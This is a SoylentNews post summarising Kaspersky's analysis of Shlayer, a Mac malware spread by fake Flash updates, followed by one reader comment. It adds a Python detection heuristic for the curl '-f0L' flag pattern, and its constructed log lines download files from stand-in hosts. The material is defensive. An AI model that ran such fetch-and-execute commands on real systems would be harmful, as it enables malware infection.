SoylentNews is people

posted by martyb on Saturday January 25 2020, @06:53AM
from the Just-Works™ dept.

Mac users are getting bombarded by laughably unsophisticated malware:

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it's the number one threat encountered by users of Kaspersky Lab's antivirus programs for macOS.

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by Kaspersky Lab's Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

An analysis Kaspersky Lab published on Thursday says that Shlayer is "a rather ordinary piece of malware" that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said "is basically the calling card of the entire family."

Another banal detail about Shlayer is its previously mentioned infection method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.
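
For defenders, the curl option combination quoted above can be turned into a check over process-execution logs. The following is an added example, not code from the article or from Kaspersky Lab: it flags curl command lines in which fail (`-f`), HTTP/1.0 (`-0`) and follow-redirects (`-L`) are all set, and it goes beyond the literal string `-f0L` by also matching reordered, split and long-form spellings. The log lines, paths and `example.invalid` URLs are constructed.

```python
import shlex

# curl short options that consume a value (partial list, enough for this check).
TAKES_VALUE = set("AbCcDdEeFHKmoPQrTtUuwXxYyz")
# Long-form equivalents of the three flags in the "-f0L" combination.
LONG_FORMS = {"--fail": "f", "--http1.0": "0", "--location": "L"}
SIGNATURE = {"f", "0", "L"}

def curl_flags(argv):
    """Collect value-less short flags (and the known long forms) from a curl argv."""
    flags, skip = set(), False
    for arg in argv[1:]:
        if skip:                          # token is the value of the previous option
            skip = False
        elif arg in LONG_FORMS:
            flags.add(LONG_FORMS[arg])
        elif arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            for i, ch in enumerate(arg[1:], start=1):
                if ch in TAKES_VALUE:     # value is the rest of the cluster or next token
                    skip = i == len(arg) - 1
                    break
                flags.add(ch)
    return flags

def matches_f0l(cmdline):
    """True if cmdline runs curl with -f, -0 and -L all set, in any spelling."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                    # unbalanced quotes: plain whitespace split
        argv = cmdline.split()
    for i, tok in enumerate(argv):
        if tok.rsplit("/", 1)[-1] == "curl":
            return SIGNATURE <= curl_flags(argv[i:])
        if " " in tok and matches_f0l(tok):   # script text passed to e.g. `sh -c`
            return True
    return False

# Constructed process-execution log lines (not taken from any real sample).
SAMPLE = [
    "/usr/bin/curl -f0L -o /tmp/constructed.zip https://example.invalid/d",
    "curl -L --fail --http1.0 https://example.invalid/d",
    "curl -fsSL https://example.invalid/install.sh",   # common benign form, no -0
    "curl -o -f0L https://example.invalid/d",          # here -f0L is a file name
    "sh -c 'curl -s -0 -Lf https://example.invalid/d'",
]

def flag_lines(lines):
    return [line for line in lines if matches_f0l(line)]

if __name__ == "__main__":
    for hit in flag_lines(SAMPLE):
        print("ALERT curl -f0L pattern:", hit)
```

The check is a hunting heuristic rather than proof of infection, since legitimate scripts can set the same three flags; it is most useful combined with the parent process and download path.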


  • (Score: 2) by BsAtHome (889) on Saturday January 25 2020, @09:29AM (#948421)

    Right so, the OS is not necessarily the primary factor. It is like the "Get rich quick" trap. Something too good to be true is only obvious to those who know how to think and refrain from too impulsive behaviour. That is, apparently, not an attribute shared by all people. You can also see it as the "Marshmallow experiment" in real life.

    Then again, there are some personality traits associated with users of different operating systems. The classic example: Apple users get shown higher prices than others. How much more restrained Apple users are, well, that would be up for debate.
